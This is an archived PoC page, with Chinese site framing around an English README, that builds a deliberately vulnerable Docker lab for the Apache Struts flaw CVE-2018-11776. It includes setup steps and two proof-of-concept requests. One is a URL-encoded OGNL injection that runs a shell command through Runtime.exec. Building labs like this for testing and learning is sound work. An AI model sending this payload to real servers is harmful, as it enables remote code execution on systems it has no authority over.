POC详情: 09e268759acea479b944a89d5181615dc7b62c0e

来源
关联漏洞
标题: Apache Struts 输入验证错误漏洞 (CVE-2018-11776)
描述:Apache Struts是美国阿帕奇(Apache)软件基金会负责维护的一个开源项目,是一套用于创建企业级Java Web应用的开源MVC框架,主要提供两个版本框架产品,Struts 1和Struts 2。Apache Struts 2是Apache Struts的下一代产品,是在Struts 1和WebWork的技术基础上进行了合并的全新Struts 2框架,其体系结构与Struts 1差别较大。 Apache Struts 2.3版本至2.3.34版本和2.5版本至2.5.16版本中存在输入验证漏洞
描述
Vulnerable docker container for CVE-2018-11776
介绍
## Vulnerable docker container for CVE-2018-11776

    # docker pull bhdresh/cve-2018-11776:1.0
    # docker run -dit -p <IP ADDRESS>:8080:8080 bhdresh/cve-2018-11776:1.0

### PoC

##### PoC - 1
   
    Request : http://<IP ADDRESS>:8080/struts2-showcase-2.3.14/${333+333}/help.action
    Result  : http://<IP ADDRESS>:8080/struts2-showcase-2.3.14/666/help.action
    
##### PoC - 2

    Request : http://<IP ADDRESS>:8080/struts2-showcase-2.3.14/%24%7B%28%23_memberAccess%5B%22allowStaticMethodAccess%22%5D%3Dtrue%2C%23a%3D@java.lang.Runtime@getRuntime%28%29.exec%28%27touch /tmp/vulnerable%27%29.getInputStream%28%29%2C%23b%3Dnew%20java.io.InputStreamReader%28%23a%29%2C%23c%3Dnew%20%20java.io.BufferedReader%28%23b%29%2C%23d%3Dnew%20char%5B51020%5D%2C%23c.read%28%23d%29%2C%23sbtest%3D@org.apache.struts2.ServletActionContext@getResponse%28%29.getWriter%28%29%2C%23sbtest.println%28%23d%29%2C%23sbtest.close%28%29%29%7D/help.action
    Result  : This would create a file named 'vulnerable' in /tmp/ directory of docker
    
    
## Steps to create vulnerable docker container

##### Create a Dockerfile

    FROM ubuntu:latest
    RUN apt-get update -y
    RUN apt-get upgrade -y
    RUN apt-get dist-upgrade -y
    RUN apt-get install default-jdk vim net-tools wget -y
    EXPOSE 8080


##### Build a docker

    # docker build -t cve-2018-11776 .


##### Start a docker

    # docker run --name cve-2018-11776 -p <IP ADDRESS>:8080:8080 -dit cve-2018-11776 /bin/bash

##### Login to docker

    # docker exec -it cve-2018-11776 /bin/bash

##### Make followinng changes inside docker

###### Set up Tomcat:

    # mkdir ~/sources
    # cd ~/sources
    # wget http://mirrors.ocf.berkeley.edu/apache/tomcat/tomcat-7/v7.0.90/bin/apache-tomcat-7.0.90.tar.gz
    # tar xvzf apache-tomcat-7.0.90.tar.gz
    # mv apache-tomcat-7.0.90 /opt/tomcat

###### Update bashrc with variables:

    # vim ~/.bashrc
    
    export JAVA_HOME=/usr/lib/jvm/default-java
    export CATALINA_HOME=/opt/tomcat
    
    # . ~/.bashrc

###### Add an admin to the Tomact gui:

    # vim /opt/tomcat/conf/tomcat-users.xml
    
    <user username="username" password="test-cve-2018-11776" roles="manager-gui,admin-gui" />

###### Start Tomcat server

    # $CATALINA_HOME/bin/startup.sh

###### Upload and deploy a vulnerable Struts2 Showcase through tomcat UI

    http://<IP ADDRESS>:8080 (username:test-cve-2018-11776)

###### Restart Tomcat

    # $CATALINA_HOME/bin/shutdown.sh
    # $CATALINA_HOME/bin/startup.sh


###### Add a vulnerable redirection action without a namespace:

    # vim /opt/tomcat/webapps/struts2-showcase-2.3.14/WEB-INF/classes/struts.xml

      <action name="help">
                  <result type="redirectAction">
                          <param name="actionName">date.action</param>
                  </result>
      </action>

    NOTE: By default, alwaysSelectFullNamespace should be set to True.

###### Restart Tomcat and check out the Struts2 Showcase page:
    
    # $CATALINA_HOME/bin/shutdown.sh
    # $CATALINA_HOME/bin/startup.sh
    
    http://<IP ADDRESS>:8080/struts2-showcase-2.3.14/showcase.jsp

### Author

@bhdresh

### References

https://github.com/xfox64x/CVE-2018-11776

https://github.com/jas502n/St2-057
文件快照

[4.0K] /data/pocs/09e268759acea479b944a89d5181615dc7b62c0e └── [3.2K] README.md 0 directories, 1 file
神龙机器人已为您缓存
备注
    1. 建议优先通过来源进行访问。
    2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
    3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。